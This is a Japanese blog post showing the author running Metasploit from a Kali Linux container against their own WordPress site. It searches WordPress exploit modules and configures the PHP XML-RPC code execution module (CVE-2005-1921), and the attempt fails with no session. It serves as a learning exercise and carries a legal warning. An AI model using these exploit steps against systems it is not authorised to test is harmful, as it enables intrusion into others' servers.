Metasploitを利用して、自サイトを攻撃してみた

  • 投稿者:
  • 投稿カテゴリー:security

※記事内容を自分が管理していないシステムに許可なく実施すれば違法となるため、絶対に実施しないでください※
Docker for Windows で Kali Linuxを起動してみる後に操作している。
攻撃といっても大したことはしておらず、xmlrpcを攻撃してみただけ。

事前準備

PS C:\Users\shimizu> docker exec -it (コンテナID) /bin/bash

root@81c581d5cf43:/# apt-get update && apt-get -y upgrade && apt-get install -y kali-linux-web
...(適用後に再起動する)

root@81c581d5cf43:/# /etc/init.d/postgresql start
Starting PostgreSQL 12 database server: main.

root@81c581d5cf43:/# update-rc.d postgresql enable

root@81c581d5cf43:/# msfdb init
...

Metasploitの実行

root@81c581d5cf43:/# msfconsole

               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:
                                :::::::+:
                      Metasploit

       =[ metasploit v5.0.66-dev                          ]
+ -- --=[ 1956 exploits - 1092 auxiliary - 336 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

WordPress用のexploitを検索する

msf5 > search rank:excellent wordpress

Matching Modules
================

   #   Name                                                           Disclosure Date  Rank       Check  Description
   -   ----                                                           ---------------  ----       -----  -----------
   0   exploit/freebsd/local/rtld_execl_priv_esc                      2009-11-30       excellent  Yes    FreeBSD rtld execl() Privilege Escalation
   1   exploit/multi/http/wp_crop_rce                                 2019-02-19       excellent  Yes    WordPress Crop-image Shell Upload
   2   exploit/multi/http/wp_db_backup_rce                            2019-04-24       excellent  Yes    WP Database Backup RCE
   3   exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload  2016-05-04       excellent  Yes    WordPress Ninja Forms Unauthenticated File Upload
   4   exploit/multi/http/wp_responsive_thumbnail_slider_upload       2015-08-28       excellent  Yes    WordPress Responsive Thumbnail Slider Arbitrary File Upload
   5   exploit/unix/webapp/joomla_akeeba_unserialize                  2014-09-29       excellent  Yes    Joomla Akeeba Kickstart Unserialize Remote Code Execution
   6   exploit/unix/webapp/jquery_file_upload                         2018-10-09       excellent  Yes    blueimp's jQuery (Arbitrary) File Upload
   7   exploit/unix/webapp/php_xmlrpc_eval                            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution
   8   exploit/unix/webapp/wp_admin_shell_upload                      2015-02-21       excellent  Yes    WordPress Admin Shell Upload
   9   exploit/unix/webapp/wp_advanced_custom_fields_exec             2012-11-14       excellent  Yes    WordPress Plugin Advanced Custom Fields Remote File Inclusion
   10  exploit/unix/webapp/wp_ajax_load_more_file_upload              2015-10-10       excellent  Yes    WordPress Ajax Load More PHP Upload Vulnerability
   11  exploit/unix/webapp/wp_asset_manager_upload_exec               2012-05-26       excellent  Yes    WordPress Asset-Manager PHP File Upload Vulnerability
   12  exploit/unix/webapp/wp_creativecontactform_file_upload         2014-10-22       excellent  Yes    WordPress Creative Contact Form Upload Vulnerability
   13  exploit/unix/webapp/wp_downloadmanager_upload                  2014-12-03       excellent  Yes    WordPress Download Manager (download-manager) Unauthenticated File Upload
   14  exploit/unix/webapp/wp_easycart_unrestricted_file_upload       2015-01-08       excellent  No     WordPress WP EasyCart Unrestricted File Upload
   15  exploit/unix/webapp/wp_foxypress_upload                        2012-06-05       excellent  Yes    WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution
   16  exploit/unix/webapp/wp_frontend_editor_file_upload             2012-07-04       excellent  Yes    WordPress Front-end Editor File Upload
   17  exploit/unix/webapp/wp_holding_pattern_file_upload             2015-02-11       excellent  Yes    WordPress Holding Pattern Theme Arbitrary File Upload
   18  exploit/unix/webapp/wp_inboundio_marketing_file_upload         2015-03-24       excellent  Yes    WordPress InBoundio Marketing PHP Upload Vulnerability
   19  exploit/unix/webapp/wp_infusionsoft_upload                     2014-09-25       excellent  Yes    WordPress InfusionSoft Upload Vulnerability
   20  exploit/unix/webapp/wp_lastpost_exec                           2005-08-09       excellent  No     WordPress cache_lastpostdate Arbitrary Code Execution
   21  exploit/unix/webapp/wp_mobile_detector_upload_execute          2016-05-31       excellent  Yes    WordPress WP Mobile Detector 3.5 Shell Upload
   22  exploit/unix/webapp/wp_nmediawebsite_file_upload               2015-04-12       excellent  Yes    WordPress N-Media Website Contact Form Upload Vulnerability
   23  exploit/unix/webapp/wp_optimizepress_upload                    2013-11-29       excellent  Yes    WordPress OptimizePress Theme File Upload Vulnerability
   24  exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload  2014-11-11       excellent  Yes    WordPress Photo Gallery Unrestricted File Upload
   25  exploit/unix/webapp/wp_pixabay_images_upload                   2015-01-19       excellent  Yes    WordPress Pixabay Images PHP Code Upload
   26  exploit/unix/webapp/wp_plainview_activity_monitor_rce          2018-08-26       excellent  Yes    WordPress Plainview Activity Monitor RCE
   27  exploit/unix/webapp/wp_platform_exec                           2015-01-21       excellent  No     WordPress Platform Theme File Upload Vulnerability
   28  exploit/unix/webapp/wp_property_upload_exec                    2012-03-26       excellent  Yes    WordPress WP-Property PHP File Upload Vulnerability
   29  exploit/unix/webapp/wp_reflexgallery_file_upload               2012-12-30       excellent  Yes    WordPress Reflex Gallery Upload Vulnerability
   30  exploit/unix/webapp/wp_revslider_upload_execute                2014-11-26       excellent  Yes    WordPress RevSlider File Upload and Execute Vulnerability
   31  exploit/unix/webapp/wp_slideshowgallery_upload                 2014-08-28       excellent  Yes    WordPress SlideShow Gallery Authenticated File Upload
   32  exploit/unix/webapp/wp_symposium_shell_upload                  2014-12-11       excellent  Yes    WordPress WP Symposium 14.11 Shell Upload
   33  exploit/unix/webapp/wp_total_cache_exec                        2013-04-17       excellent  Yes    WordPress W3 Total Cache PHP Code Execution
   34  exploit/unix/webapp/wp_worktheflow_upload                      2015-03-14       excellent  Yes    WordPress Work The Flow Upload Vulnerability
   35  exploit/unix/webapp/wp_wpshop_ecommerce_file_upload            2015-03-09       excellent  Yes    WordPress WPshop eCommerce Arbitrary File Upload Vulnerability
   36  exploit/unix/webapp/wp_wptouch_file_upload                     2014-07-14       excellent  Yes    WordPress WPTouch Authenticated File Upload
   37  exploit/unix/webapp/wp_wysija_newsletters_upload               2014-07-01       excellent  Yes    WordPress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload
   38  exploit/windows/fileformat/ms12_005                            2012-01-10       excellent  No     MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability
   39  exploit/windows/fileformat/winrar_name_spoofing                2009-09-28       excellent  No     WinRAR Filename Spoofing

php_xmlrpc_evalを選択して、情報表示する

msf5 > use exploit/unix/webapp/php_xmlrpc_eval

msf5 exploit(unix/webapp/php_xmlrpc_eval) > info

       Name: PHP XML-RPC Arbitrary Code Execution
     Module: exploit/unix/webapp/php_xmlrpc_eval
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2005-06-29

Provided by:
  hdm <x@hdm.io>
  cazz <bmc@shmoo.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  PATH     /xmlrpc.php      yes       Path to xmlrpc.php
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    80               yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 512

Description:
  This module exploits an arbitrary code execution flaw discovered in
  many implementations of the PHP XML-RPC module. This flaw is
  exploitable through a number of PHP web applications, including but
  not limited to Drupal, WordPress, Postnuke, and TikiWiki.

References:
  https://cvedetails.com/cve/CVE-2005-1921/
  OSVDB (17793)
  http://www.securityfocus.com/bid/14088

オプションを選択して、実行する

今回のWordPressに脆弱性はないため、exploitは失敗する。

msf5 exploit(unix/webapp/php_xmlrpc_eval) > set RHOSTS tech.akat.info
RHOSTS => tech.akat.info

msf5 exploit(unix/webapp/php_xmlrpc_eval) > set RPORT 443
RPORT => 443

msf5 exploit(unix/webapp/php_xmlrpc_eval) > set SSL true
SSL => true

msf5 exploit(unix/webapp/php_xmlrpc_eval) > show options

Module options (exploit/unix/webapp/php_xmlrpc_eval):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /xmlrpc.php      yes       Path to xmlrpc.php
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   tech.akat.info   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(unix/webapp/php_xmlrpc_eval) > exploit
...
[-] exploit failed: no response
[*] Exploit completed, but no session was created.

補足-GUIでExploit情報を閲覧することも可能

https://www.exploit-db.com/